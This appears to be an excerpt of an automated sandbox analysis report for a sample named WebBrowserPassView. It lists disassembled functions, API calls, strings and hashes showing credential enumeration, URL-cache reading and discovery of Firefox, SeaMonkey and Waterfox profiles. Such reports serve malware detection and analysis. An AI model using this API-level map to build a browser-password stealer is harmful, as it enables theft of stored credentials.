GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 004159C8
GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 004159D4
GetProcAddress.KERNEL32(?,EnumProcesses), ref: 004159E0
GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 004159EC

Strings

psapi.dll, xrefs: 004159A2
GetModuleInformation, xrefs: 004159E2
GetModuleBaseNameW, xrefs: 004159B2
EnumProcesses, xrefs: 004159D6
EnumProcessModules, xrefs: 004159BE
GetModuleFileNameExW, xrefs: 004159CA

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
API String ID: 2941347001-70141382
Opcode ID: 8d8171eaa7233f23c424eae13fe9b2c2f689341781acc4346e714e5fd4705eee
Instruction ID: 12a6a4dc47c8e0d72b77561104e235da68e0514af3b1e08ca0077668fc786df3
Opcode Fuzzy Hash: 8d8171eaa7233f23c424eae13fe9b2c2f689341781acc4346e714e5fd4705eee
Instruction Fuzzy Hash: 11F012B4840B00AACB306F759818B1ABEE0EF98701B218C2EE8C093651DBB9A044CF49

Uniqueness

Uniqueness Score: -1.00%

Function 0044692C Relevance: 18.1, APIs: 12, Instructions: 134
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,0044F4C0,00000070), ref: 0044693B
__set_app_type.MSVCRT ref: 0044699A
__p__fmode.MSVCRT ref: 004469AF
__p__commode.MSVCRT ref: 004469BD
__setusermatherr.MSVCRT ref: 004469E9
_initterm.MSVCRT ref: 004469FF
__wgetmainargs.KERNELBASE ref: 00446A22
_initterm.MSVCRT ref: 00446A35
GetStartupInfoW.KERNEL32(?), ref: 00446A92
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00446AB8
exit.KERNELBASE ref: 00446ACF
_cexit.MSVCRT ref: 00446AD5

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
String ID:
API String ID: 2827331108-0
Opcode ID: 1bc338ee3b8d3947f4f852b887b9aa9ad05690fc0c9637ad4250d23db7a3d92d
Instruction ID: bb7a70230f37617634207b9b7a32dcb89b9454a8d8bf9e63e77bc0a4be8b0e92
Opcode Fuzzy Hash: 1bc338ee3b8d3947f4f852b887b9aa9ad05690fc0c9637ad4250d23db7a3d92d
Instruction Fuzzy Hash: CA519FB1D00714EAEB209F64D848AAE7BF0EB0A715F21813BE451E7291D7788885CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C722 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040C746

Part of subcall function 00416B94: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00416BCE

Part of subcall function 0040C34B: memset.MSVCRT ref: 0040C36D
Part of subcall function 0040C34B: memset.MSVCRT ref: 0040C387

Part of subcall function 0040B5F5: ??2@YAPAXI@Z.MSVCRT ref: 0040B5FE

FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C7BB
wcschr.MSVCRT ref: 0040C7D2
wcschr.MSVCRT ref: 0040C7F2
FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C817
GetLastError.KERNEL32 ref: 0040C821
FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C84D
FindCloseUrlCache.WININET(?), ref: 0040C85E

Strings

visited:, xrefs: 0040C7B6

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
String ID: visited:
API String ID: 2470578098-1702587658
Opcode ID: d051b6bee11d765b52f56e7531097d9158d55cb802cc7655925d0cc4dd98efa9
Instruction ID: 636e8e32e5b1bb4d98569f2fcce6fed8f1b817539a9b6f5200b068eacb01c51d
Opcode Fuzzy Hash: d051b6bee11d765b52f56e7531097d9158d55cb802cc7655925d0cc4dd98efa9
Instruction Fuzzy Hash: 90419776D00219EBDB10EF95CC85AAFBB78EF45714F10017AE904F7281D738AA45CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040BED3 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004083CC: _wcsicmp.MSVCRT ref: 004083FD

memset.MSVCRT ref: 0040BF1B

Part of subcall function 004086CB: memset.MSVCRT ref: 004087C7

free.MSVCRT(000000FF,?,000000FF,00000000,00000104,74D0F560), ref: 0040BFE9

Part of subcall function 0040BAAE: _wcsicmp.MSVCRT ref: 0040BAC7

Part of subcall function 0040B109: wcslen.MSVCRT ref: 0040B118
Part of subcall function 0040B109: _memicmp.MSVCRT ref: 0040B146

_snwprintf.MSVCRT ref: 0040BFB5

Part of subcall function 0040AEF6: wcslen.MSVCRT ref: 0040AF08
Part of subcall function 0040AEF6: free.MSVCRT(?,00000001,?,00000000,?,?,0040B39C,?,000000FF), ref: 0040AF2E
Part of subcall function 0040AEF6: free.MSVCRT(?,00000001,?,00000000,?,?,0040B39C,?,000000FF), ref: 0040AF51
Part of subcall function 0040AEF6: memcpy.MSVCRT ref: 0040AF75

Strings

, xrefs: 0040BF36
Container_%I64d, xrefs: 0040BFA4
Name, xrefs: 0040BF67
Containers, xrefs: 0040BEF3
ContainerId, xrefs: 0040BF5A

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
String ID: $ContainerId$Container_%I64d$Containers$Name
API String ID: 2804212203-2982631422
Opcode ID: 2b6fb5568fe7eb0d901e8944418d3268794990f91a935eab2d1831731a717fbf
Instruction ID: afe11abc20e36003db74d94c549cded038fcd9f42a86337aeda0c7f756a0cb8d
Opcode Fuzzy Hash: 2b6fb5568fe7eb0d901e8944418d3268794990f91a935eab2d1831731a717fbf
Instruction Fuzzy Hash: 72317671D0021A6ADF10EFA5CD459DEB7B8EF04344F11007BA518B7181DB38AE858F99

Uniqueness

Uniqueness Score: -1.00%

Function 0040154C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040D0D4: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040118B,?,?,?,?,000003FF), ref: 0040D0F2
Part of subcall function 0040D0D4: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040D146

Part of subcall function 0040D19E: _wcsicmp.MSVCRT ref: 0040D1D8

memset.MSVCRT ref: 00401629
memset.MSVCRT ref: 00401640
WideCharToMultiByte.KERNEL32(00000000,00000000,0044F4CC,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040118B,?,?), ref: 0040165C
memcmp.MSVCRT ref: 0040168A
memcpy.MSVCRT ref: 004016DF
LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040118B), ref: 004016F1

Strings

, xrefs: 004016CD

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
String ID:
API String ID: 509814883-3916222277
Opcode ID: af66d6d532b4a529225be6658073baeaa4897cb95b1b204350b638149536f083
Instruction ID: 6182344d234d3d85177f64ddd9228ac02bc8ade9e8908f776b6b681188bf9119
Opcode Fuzzy Hash: af66d6d532b4a529225be6658073baeaa4897cb95b1b204350b638149536f083
Instruction Fuzzy Hash: 1941E5B2D002196BDB10EBA5CC45ADFB7ADAF44304F05097BB509F7192DA389E48CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00411FB2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00411FE9
??2@YAPAXI@Z.MSVCRT ref: 0041201F
??2@YAPAXI@Z.MSVCRT ref: 0041205D
GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 004120CF
LoadIconW.USER32(00000000,00000065), ref: 004120D8
wcscpy.MSVCRT ref: 004120ED

Strings

=E, xrefs: 00411FDF

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: ??2@$HandleIconLoadModulememsetwcscpy
String ID: =E
API String ID: 2791114272-2289002813
Opcode ID: 6717c7504d51a5bbc073fb69a6a2eb538a62dbd8f8af7227683567ac2f89e9c8
Instruction ID: aad15f6d1b3b0a24ca9589720555a1dcf89de37177915705ae93bfa8ddf3393c
Opcode Fuzzy Hash: 6717c7504d51a5bbc073fb69a6a2eb538a62dbd8f8af7227683567ac2f89e9c8
Instruction Fuzzy Hash: 26316BB19013498FDB30EF668C896CABBE8EF49314F10452FE90CCB241EBB946558B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040CC16 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040B7D1: free.MSVCRT(?,0040B282,00000000,?,00000000), ref: 0040B7D4
Part of subcall function 0040B7D1: free.MSVCRT(?,?,0040B282,00000000,?,00000000), ref: 0040B7DC

Part of subcall function 0040B02A: free.MSVCRT(00000000,0040B3AF,00000000,?,00000000), ref: 0040B031

Part of subcall function 0040C722: memset.MSVCRT ref: 0040C746
Part of subcall function 0040C722: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C7BB
Part of subcall function 0040C722: wcschr.MSVCRT ref: 0040C7D2
Part of subcall function 0040C722: wcschr.MSVCRT ref: 0040C7F2
Part of subcall function 0040C722: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C817
Part of subcall function 0040C722: GetLastError.KERNEL32 ref: 0040C821

Part of subcall function 0040C871: memset.MSVCRT ref: 0040C8E7
Part of subcall function 0040C871: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C915
Part of subcall function 0040C871: _wcsupr.MSVCRT ref: 0040C92F
Part of subcall function 0040C871: memset.MSVCRT ref: 0040C97E
Part of subcall function 0040C871: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C9A9

_wcslwr.MSVCRT ref: 0040CCC5

Part of subcall function 0040CAE2: wcslen.MSVCRT ref: 0040CB0D
Part of subcall function 0040CAE2: memset.MSVCRT ref: 0040CB6D

wcslen.MSVCRT ref: 0040CCDA

Strings

https://www.google.com/accounts/servicelogin, xrefs: 0040CC58
http://www.facebook.com/, xrefs: 0040CC65
/, xrefs: 0040CCE6
/, xrefs: 0040CCF1
https://login.yahoo.com/config/login, xrefs: 0040CC72

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
API String ID: 2936932814-4196376884
Opcode ID: 482f6134f7daacc017189fcee8ab3649d22c01fd56a7a6b5197cc4e451d6cae4
Instruction ID: eace9bc4984dd9296d8cbd5f4ce7f45cb0460178c22a9edad4fb6917611d5c96
Opcode Fuzzy Hash: 482f6134f7daacc017189fcee8ab3649d22c01fd56a7a6b5197cc4e451d6cae4
Instruction Fuzzy Hash: 03217571600214A6CF10BF5ADC8589E7B68EF44344B20417BF804B7182D778DE85DA99

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE2A Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 40libraryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040AE4A
GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040AE67
wcscpy.MSVCRT ref: 0040AE7A
wcscat.MSVCRT ref: 0040AE90
LoadLibraryW.KERNELBASE(00000000), ref: 0040AEA1
LoadLibraryW.KERNEL32(?), ref: 0040AEAA

Strings

C:\Windows\system32, xrefs: 0040AE52, 0040AE5A, 0040AE66, 0040AE78

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
String ID: C:\Windows\system32
API String ID: 669240632-2896066436
Opcode ID: 8a6edf88a0c2374f88dd8367b006526617f4906d0ebb873f97f1b08593d0deb6
Instruction ID: 7b2e6449704ba0194f95f82772fbf49f9cd5c89e16ce75b46b49e10d3cb4640d
Opcode Fuzzy Hash: 8a6edf88a0c2374f88dd8367b006526617f4906d0ebb873f97f1b08593d0deb6
Instruction Fuzzy Hash: 65F0A471D41324A6EF107B61DC06B8B3B68AB00754F0144B2B908B3192EB78AE988FD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040B8EC Relevance: 12.2, APIs: 8, Instructions: 151COMMON

Download Yara Rule

APIs

Part of subcall function 004075C7: GetProcAddress.KERNEL32(?,00000000), ref: 004075FC
Part of subcall function 004075C7: GetProcAddress.KERNEL32(?,00000000), ref: 00407610
Part of subcall function 004075C7: GetProcAddress.KERNEL32(?,00000000), ref: 00407623
Part of subcall function 004075C7: GetProcAddress.KERNEL32(?,00000000), ref: 00407637
Part of subcall function 004075C7: GetProcAddress.KERNEL32(?,00000000), ref: 0040764B

CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040B925
wcslen.MSVCRT ref: 0040B942
wcsncmp.MSVCRT(?,?,?,00000214,?,00000000,?), ref: 0040B974
memset.MSVCRT ref: 0040B9CD
memcpy.MSVCRT ref: 0040B9EE
_wcsnicmp.MSVCRT ref: 0040BA38
wcschr.MSVCRT ref: 0040BA60
LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BA84

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
String ID:
API String ID: 697348961-0
Opcode ID: 93ecba6a689d5c320bdaef842fb6c50b4f1763f90038faa5d7af11543cd44ae8
Instruction ID: fabfe86e697632e3a113e667da81389391c5e61e9c799e2ba2b38c502135d7e8
Opcode Fuzzy Hash: 93ecba6a689d5c320bdaef842fb6c50b4f1763f90038faa5d7af11543cd44ae8
Instruction Fuzzy Hash: 37510AB1E002099FDF20DFA5C8859AEBBF8EF48304F10452AE919F7251E735A945CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0041303D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00413060
memset.MSVCRT ref: 00413075
memset.MSVCRT ref: 0041308A
memset.MSVCRT ref: 0041309F
memset.MSVCRT ref: 004130B4

Part of subcall function 00416B94: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00416BCE

Part of subcall function 00416B94: memset.MSVCRT ref: 00416BED
Part of subcall function 00416B94: RegCloseKey.ADVAPI32(004148A8,?,?,?,?,?,00000000), ref: 00416C54
Part of subcall function 00416B94: wcscpy.MSVCRT ref: 00416C62

Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2E8
Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2F2
Part of subcall function 0040A2DE: wcscpy.MSVCRT ref: 0040A306
Part of subcall function 0040A2DE: wcscat.MSVCRT ref: 0040A314

Part of subcall function 004134F0: memset.MSVCRT ref: 00413513
Part of subcall function 004134F0: wcscpy.MSVCRT ref: 00413577
Part of subcall function 004134F0: wcscpy.MSVCRT ref: 00413588
Part of subcall function 004134F0: memset.MSVCRT ref: 004135A1
Part of subcall function 004134F0: memset.MSVCRT ref: 004135B6
Part of subcall function 004134F0: _snwprintf.MSVCRT ref: 004135D0
Part of subcall function 004134F0: wcscpy.MSVCRT ref: 004135E3

memset.MSVCRT ref: 0041317B

Part of subcall function 00409F85: wcslen.MSVCRT ref: 00409F8C
Part of subcall function 00409F85: memcpy.MSVCRT ref: 00409FA2

Strings

Waterfox\Profiles, xrefs: 004130E1, 004130FC
Waterfox, xrefs: 00413114

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
String ID: Waterfox$Waterfox\Profiles
API String ID: 4039892925-11920434
Opcode ID: d5c71e77324afc4b5cc82ea4ce8339bfbd05d02e97acfa20c2f281ec6797be4d
Instruction ID: 961380efd413e994d860ccb56e6665ca3f7b28eb71c2195a5a659fa08900d420
Opcode Fuzzy Hash: d5c71e77324afc4b5cc82ea4ce8339bfbd05d02e97acfa20c2f281ec6797be4d
Instruction Fuzzy Hash: C74144B294121CAADB20EB56CC81FCF777CAF85314F1144A7B508F2141EA745B88CF6A

Uniqueness

Uniqueness Score: -1.00%

Function 004131CE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004131F1
memset.MSVCRT ref: 00413206
memset.MSVCRT ref: 0041321B
memset.MSVCRT ref: 00413230
memset.MSVCRT ref: 00413245

Part of subcall function 00416B94: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00416BCE

Part of subcall function 00416B94: memset.MSVCRT ref: 00416BED
Part of subcall function 00416B94: RegCloseKey.ADVAPI32(004148A8,?,?,?,?,?,00000000), ref: 00416C54
Part of subcall function 00416B94: wcscpy.MSVCRT ref: 00416C62

Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2E8
Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2F2
Part of subcall function 0040A2DE: wcscpy.MSVCRT ref: 0040A306
Part of subcall function 0040A2DE: wcscat.MSVCRT ref: 0040A314

Part of subcall function 004134F0: memset.MSVCRT ref: 00413513
Part of subcall function 004134F0: wcscpy.MSVCRT ref: 00413577
Part of subcall function 004134F0: wcscpy.MSVCRT ref: 00413588
Part of subcall function 004134F0: memset.MSVCRT ref: 004135A1
Part of subcall function 004134F0: memset.MSVCRT ref: 004135B6
Part of subcall function 004134F0: _snwprintf.MSVCRT ref: 004135D0
Part of subcall function 004134F0: wcscpy.MSVCRT ref: 004135E3

memset.MSVCRT ref: 0041330C

Part of subcall function 00409F85: wcslen.MSVCRT ref: 00409F8C
Part of subcall function 00409F85: memcpy.MSVCRT ref: 00409FA2

Strings

Mozilla\SeaMonkey\Profiles, xrefs: 00413272, 0041328D
Mozilla\SeaMonkey, xrefs: 004132A5

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
API String ID: 4039892925-2068335096
Opcode ID: a6f98496c2212be6f2916d1f1e48eedc26af0efe673e4bd53c3bd508ed4be210
Instruction ID: 891e70054f67f373fcd1da7e6bb8e88c65c93f586ac1dbd30abc510520fb583d
Opcode Fuzzy Hash: a6f98496c2212be6f2916d1f1e48eedc26af0efe673e4bd53c3bd508ed4be210
Instruction Fuzzy Hash: AF4142B294121CAADB20EB56CC81FCF777CAF85314F1144ABB509F2142EA745B84CF6A

Uniqueness

Uniqueness Score: -1.00%

Function 0041335F Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00413382
memset.MSVCRT ref: 00413397
memset.MSVCRT ref: 004133AC
memset.MSVCRT ref: 004133C1
memset.MSVCRT ref: 004133D6

Part of subcall function 00416B94: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00416BCE

Part of subcall function 00416B94: memset.MSVCRT ref: 00416BED
Part of subcall function 00416B94: RegCloseKey.ADVAPI32(004148A8,?,?,?,?,?,00000000), ref: 00416C54
Part of subcall function 00416B94: wcscpy.MSVCRT ref: 00416C62

Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2E8
Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2F2
Part of subcall function 0040A2DE: wcscpy.MSVCRT ref: 0040A306
Part of subcall function 0040A2DE: wcscat.MSVCRT ref: 0040A314

Part of subcall function 004134F0: memset.MSVCRT ref: 00413513
Part of subcall function 004134F0: wcscpy.MSVCRT ref: 00413577
Part of subcall function 004134F0: wcscpy.MSVCRT ref: 00413588
Part of subcall function 004134F0: memset.MSVCRT ref: 004135A1
Part of subcall function 004134F0: memset.MSVCRT ref: 004135B6
Part of subcall function 004134F0: _snwprintf.MSVCRT ref: 004135D0
Part of subcall function 004134F0: wcscpy.MSVCRT ref: 004135E3

memset.MSVCRT ref: 0041349D

Part of subcall function 00409F85: wcslen.MSVCRT ref: 00409F8C
Part of subcall function 00409F85: memcpy.MSVCRT ref: 00409FA2

Strings

Mozilla\Firefox\Profiles, xrefs: 00413403, 0041341E
Mozilla\Firefox, xrefs: 00413436

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
API String ID: 4039892925-3369679110
